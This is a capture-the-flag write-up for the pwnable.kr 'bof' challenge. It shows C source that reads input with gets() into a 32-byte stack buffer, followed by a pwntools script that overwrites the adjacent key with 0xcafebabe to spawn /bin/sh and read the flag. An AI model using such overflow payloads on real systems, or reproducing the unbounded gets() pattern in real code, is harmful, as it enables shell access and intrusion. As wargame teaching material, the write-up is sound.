[Pwnable.kr] bof
dtqdtq01
2019. 2. 17. 06:33
[Pwnable.kr] bof
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
// Challenge routine: prompts, reads one line from stdin into a 32-byte stack
// buffer, then starts /bin/sh only when `key` equals 0xcafebabe; otherwise it
// prints "Nah..". The caller on this page always passes 0xdeadbeef, so the
// shell branch is reachable only if `key` is changed by the unbounded read.
void func(int key){
char overflowme[32];
printf("overflow me : ");
// gets() takes no length argument and keeps copying until newline/EOF, so any
// input longer than 31 bytes writes past overflowme into adjacent stack memory
// (CWE-242 use of an inherently dangerous function, CWE-121 stack overflow).
// gets() was removed from the language in C11. The bounded equivalent is
// fgets(overflowme, sizeof overflowme, stdin).
gets(overflowme); // smash me!
// NOTE(review): this check trusts a value that lives on the same stack as the
// overflowed buffer. A stack protector, where enabled, is verified only when
// func returns, i.e. after this comparison has already run, so it should not
// be relied on to guard this branch; bounding the read is the actual fix.
if(key == 0xcafebabe){
system("/bin/sh");
}else{
printf("Nah..\n");
}
}
/* Entry point: calls func() once with the fixed key 0xdeadbeef and exits 0.
 * Command-line arguments are accepted but never read. */
int main(int argc, char* argv[]){
    (void)argc;
    (void)argv;

    /* Constant key handed to func(); it never matches the value func() tests
     * for unless memory is corrupted inside func(). */
    int initial_key = 0xdeadbeef;

    func(initial_key);
    return 0;
}
from pwn import *
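# nc pwnable.kr 9000
# Solution script for the "bof" practice challenge: connects to the wargame
# service named in the write-up, sends one over-long line, then lists the
# directory and prints the flag file.
p = remote("pwnable.kr", 9000)

# 52 filler bytes is the buffer-to-key distance this write-up uses; it depends
# on how func() was compiled, so it is specific to this challenge binary.
# The last four bytes are 0xcafebabe in little-endian order.
# Bytes literals are used so the payload is sent byte-for-byte on Python 3
# (a str containing "\xbe" would first have to be encoded).
payload = b"A" * 52
payload += b"\xbe\xba\xfe\xca"

# The original called s.sendline()/s.interactive(), but the connection object
# is bound to `p`; `s` was never defined and raised NameError.
p.sendline(payload)
p.sendline(b"ls")
p.sendline(b"cat flag")
p.interactive()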
daddy, I just pwned a buFFer :)